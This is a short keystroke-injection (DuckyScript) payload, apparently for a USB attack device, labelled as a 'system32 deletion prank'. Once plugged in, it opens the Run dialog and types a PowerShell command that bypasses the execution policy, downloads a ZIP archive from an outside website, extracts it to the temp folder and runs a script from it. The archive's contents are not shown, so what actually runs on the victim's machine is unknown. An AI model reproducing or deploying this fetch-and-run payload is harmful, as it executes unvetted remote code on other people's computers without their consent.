REM @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
REM @ INFO:                                         @
REM @                                               @
REM @ This script simulates a system32 deletion     @         
REM @ prank. It downloads a ZIP file from a URL,    @
REM @ extracts it to the temporary directory,       @
REM @ and runs a PowerShell script from the archive.@
REM @                                               @
REM @ Created by: milis                             @
REM @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

DELAY 1000
GUI r
DELAY 300
STRING powershell -NoP -Ep Bypass $D="$env:tmp";iwr -Uri 'https://www.bestwebsite.ca/files/System32DeletionPrank.zip' -O "$D\sysprank.zip";Expand-Archive "$D\sysprank.zip" -Des $D -Force;. "$D\script.ps1"
ENTER
